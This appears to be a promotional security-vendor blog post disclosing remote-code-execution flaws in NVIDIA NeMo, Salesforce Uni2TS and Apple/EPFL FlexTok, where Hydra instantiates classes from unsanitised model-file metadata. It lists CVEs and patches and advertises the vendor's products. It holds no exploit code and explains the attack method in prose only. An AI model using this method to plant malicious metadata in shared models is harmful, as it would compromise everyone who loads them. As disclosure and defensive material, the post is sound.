AI Libraries Under Siege: Uncovering Hidden Vulnerabilities in Popular AI/ML Tools
Imagine a world where the very tools powering AI innovation could be weaponized against us. This isn't science fiction; it's a stark reality we've uncovered. Three widely-used AI/ML libraries, developed by tech giants like Apple, Salesforce, and NVIDIA, contain vulnerabilities that could allow remote code execution (RCE) when loading seemingly innocent model files. But here's where it gets controversial: these vulnerabilities have been lurking in plain sight, potentially exposing countless AI applications to malicious attacks.
The Culprits: Popular Libraries with a Dark Secret
These vulnerable libraries, all open-source and hosted on GitHub, are:
- NeMo (NVIDIA): A PyTorch-based framework for developing diverse AI/ML models, boasting over 700 models on HuggingFace with millions of downloads.
- Uni2TS (Salesforce): A PyTorch library powering Salesforce's Morai, a time series analysis model with hundreds of thousands of downloads.
- FlexTok (Apple & EPFL VILAB): A Python framework enabling image processing in AI/ML models, primarily used by EPFL VILAB models with tens of thousands of downloads.
The Vulnerability: A Metadata Backdoor
The issue lies in how these libraries handle metadata within model files. They use a third-party library called Hydra to instantiate classes based on this metadata. The problem? Vulnerable versions of these libraries execute the metadata as code without proper sanitization. This means an attacker could embed malicious code in the metadata, which would be automatically executed when the model is loaded. And this is the part most people miss: even though newer, 'safe' file formats like safetensors exist, these libraries still fall victim to this metadata exploit.
A Race Against Time: Patches and Protections
Fortunately, the vendors have been notified and have taken action:
- NVIDIA patched NeMo (CVE-2025-23304) with a new 'safe_instantiate' function that validates metadata before execution.
- Salesforce addressed the Uni2TS vulnerability (CVE-2026-22584) by implementing an allowlist and strict validation for executable modules.
- Apple & EPFL VILAB updated FlexTok to use YAML for configuration parsing and added an allowlist of classes for Hydra's instantiate function.
The Bigger Picture: A Call for Vigilance
While no malicious exploits have been detected yet, the potential for harm is significant. Attackers could easily modify popular models, adding malicious metadata under the guise of improvements. This highlights a critical issue: the vast attack surface created by the proliferation of AI/ML libraries and the lack of transparency around metadata in platforms like HuggingFace.
Palo Alto Networks to the Rescue
Our Prisma AIRS solution can identify models exploiting these vulnerabilities and extract their payloads. Additionally, our Cortex Cloud Vulnerability Management and Unit 42 AI Security Assessment services provide comprehensive protection and risk mitigation for AI deployments.
The Debate: Balancing Innovation and Security
This discovery raises important questions: How can we ensure the security of AI models without stifling innovation? Should platforms like HuggingFace implement stricter metadata scrutiny? The AI community needs to engage in open dialogue to address these challenges and build a more secure future for AI.
What's Next?
As AI continues to evolve, so will the threats. We urge developers and users to remain vigilant, prioritize security in their AI practices, and leverage tools like those offered by Palo Alto Networks to protect their AI investments. The battle for AI security is ongoing, and we must all play our part.